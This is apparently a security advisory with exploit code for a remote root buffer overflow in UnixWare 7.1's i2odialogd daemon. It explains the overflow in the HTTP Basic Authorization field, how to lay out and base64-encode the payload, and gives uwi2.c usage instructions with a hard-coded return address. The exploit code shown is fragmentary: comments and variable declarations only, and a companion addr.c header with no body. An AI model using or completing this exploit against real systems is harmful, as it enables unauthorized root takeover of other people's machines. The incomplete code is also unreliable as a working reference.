It is possible to gain remote root access to a UnixWare 7.1 system by exploiting vulnerability in the i2odialogd daemon. This daemon is installed and runs by default.
Credit:
The information was provided by: Brock Tellier.
The i2odialog daemon is an HTTP front-end to control the i2o subsystem. A user who has control over this subsystem can do all sorts of nasty things and therefore authentication is performed, against the local root password. The authentication is the standard HTTP authentication:
GET / HTTP/1.0
Authorization: Basic username:password\r\n\r\n
Unfortunately, there is a classic buffer overflow in the username:password field. When fed a string of 88+ characters, the daemon crashes. The only complication to this exploit is the fact that according to the relevant RFC's, the username:password pair must be base64(MIME) encoded. Therefore we are forced to MIME encode our entire exploit string. In addition to this, the buffer we have to work with is very small, so we'll be changing the order of NOP+SHELLCODE+ADDR to ADDR+NOP+SHELLCODE in order to give ourselves a wider range of usable addresses.
Exploit:
Some notes about the exploit:
No mimencode() functions has been added to this exploit code meaning that have to hard-code your exploit string. This means that if you want to change the return address from the default you have below you're going to have to MIME encode 92 bytes of addresses (or 88 bytes of garbage and your 4-byte address), then some NOP's, then the shellcode, then a colon, any character and a 'NULL. ADDR+NOP+SHELLCODE+:+A+0'. You must this MIME-encoded string (don't forget that you must NOT append a newline to the exploit string) into the program where it is marked.
Under UnixWare, you can use mimencode(1) to convert stdout from your program into MIME-encoded text.
---uwi2.c---
/* uwi2.c
*
* i2o remote root exploit for UnixWare 7.1
* compile on UnixWare with cc -o uwi2 uwi2.c -lsocket -lnsl
* ./uwi2 <hostname>
* The hard-coded RET address is 0x8047d4c
*
* To either replace the shellcode or change the offset you must
* first craft a program which outputs, in this order:
* - 92 bytes of your RET address (EIP starts at 89)
* - NOPs, as many as you would like
* - your shellcode
* - the character ":"
* - any character, maybe "A", as I've done below
* - NULL
* When printf()'ing this string, do NOT append a \newline!
* You then pipe the output of this program to a MIME encoder (mimencode
* on UnixWare). You then take the output of this program and paste it
* where I've marked below.
*
* Brock Tellier btellier@usa.net
*
*/
char buf[BUFLEN];
char sockbuf[BUFLEN];
char c;
int offset=0;
int i, ascii,num;
int i2oport = 360;
int sock;
int addr = 0x80474b4;
struct sockaddr_in sock_a;
struct hostent *host;
/*
* addr.c - Add-on for the UnixWare 7.1 remote root exploit in i2dialogd
* simply MIME encode the output of this program and put into the
* appropriate place in uwi2.c
*
* Usage: cc -o addr addr.c; ./addr <offset> <size>
*
* Brock Tellier btellier@usa.net
*/
